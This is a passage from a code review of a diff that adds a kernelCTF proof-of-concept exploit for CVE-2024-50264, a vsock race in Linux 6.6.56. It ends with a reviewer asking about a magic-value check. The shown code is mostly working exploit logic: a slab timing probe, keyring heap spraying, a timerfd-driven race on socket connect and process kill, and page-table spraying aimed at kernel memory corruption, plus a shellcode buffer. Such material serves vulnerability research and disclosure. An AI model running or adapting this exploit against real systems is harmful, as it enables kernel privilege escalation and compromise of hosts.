pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/lts-6.6.56/exploit.c

```diff
@@ -0,0 +1,877 @@
+			t1 = rdtsc_end();
+			times[i] = t1-t0;
+		}
+
+		int inuse = -1, currv = 0;
+		for(int i=OBJS_PER_SLAB-1; i>=0; i--)
+			if(times[i] > 6000)
+			{
+				inuse = OBJS_PER_SLAB - i;
+				break;
+			}
+		
+		printf("inuse: %d\n", inuse);
+		usleep(10000);
+
+		for(int i=inuse; i<OBJS_PER_SLAB-1; i++)
+			spray_vvs(&remainfd[i], 1);
+		
+		remove_keyring(keyv);
+		spray_vvs(&remainfd[OBJS_PER_SLAB-1], 1);
+
+		write(communicate_pipe[1], "123", 3);
+
+		struct itimerspec it = {};
+		int tfd;
+		int rand = v;
+
+		FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0);
+		unsigned long tmp;
+		it.it_value.tv_sec = 0;
+		it.it_value.tv_nsec = rand * NS_PER_JIFFIE;
+		FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0);
+
+		printf("socket b connect count: %d\n", rand);
+		read(tfd, &tmp, sizeof(tmp));
+
+		if(connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr)) < 0)
+			perror("connect");
+	} else {
+		read(communicate_pipe[0], comm_buf, 3);
+
+		struct itimerspec it = {};
+		int tfd;
+		int kill_rand = v;
+
+		FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0);
+		unsigned long tmp;
+		it.it_value.tv_sec = 0;
+		it.it_value.tv_nsec = kill_rand * NS_PER_JIFFIE;
+		FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0);
+
+		read(tfd, &tmp, sizeof(tmp));
+
+		kill(conn_pid, SIGKILL);
+		printf("socket b kill count: %d\n", kill_rand);
+		wait(NULL);
+	}
+	close(communicate_pipe[0]), close(communicate_pipe[1]);
+
+	_pin_to_cpu(MAIN_CPU);
+	for(int i=0; i < N_PAGESPRAY; i++)
+		*(uint64_t *)(page_spray[i]) = (i << 16);
+	printf("p4d spray fin\n");
+
+	sleep(1);
+
+	struct itimerspec new = {.it_value.tv_nsec = 1500000};
+	timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
+	
+	connect_addr.svm_cid = 0;
+	connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr));
+	listen(socket_b, 0);
+
+	for(int i=0; i < N_PAGESPRAY; i++)
+		for(int j=MMAP_SIZE/0x2000; j<MMAP_SIZE/0x1000; j += 0x60/8)
+			*(uint64_t *)(page_spray[i] + 0x3000 + 0x1000*j) = (i << 16) + j;
+	printf("pte spray fin\n");
+
+	return 0;
+}
+
+
+char shellcode[0x1000];
+int heap_spraying(void *arg)
+{
+	union key_payload payload = {};
+	union key_payload readout = {};
+	key_serial_t keys[256] = {};
+
+	status_spray = SPRAY_ERROR;
+
+	int race_trigger_pid = clone(race_trigger, trigger_stack, CLONE_VM | SIGCHLD, NULL);
+	FAIL_IF(race_trigger_pid < 0);
+
+	const size_t payload_size = sizeof(payload.vvs) - sizeof(payload.key.header);
+	memset(&payload, '?', sizeof(payload));
+
+	_pin_to_cpu(MAIN_CPU);
+
+	unsigned long long begin = get_jiffies();
+	do {
+
+	} while (get_jiffies() - begin < 25);
+	wait(race_trigger_pid);
+
+	cleanup_seqs();
+	release_all_socks();
+
+	int success = 0;
+	for(int i=0; i < N_PAGESPRAY; i++)
+		for(int j=MMAP_SIZE/0x2000; j<MMAP_SIZE/0x1000; j += 0x60/8)
+		{
+			uint64_t v = *(uint64_t *)(page_spray[i] + 0x3000 + 0x1000*j + 0x100);
+			if(v && v != 0xb390909000000000)
```

Comment:
Why are you checking for this condition: `v != 0xb390909000000000`? In which case is that (`v == 0xb390909000000000 `) true?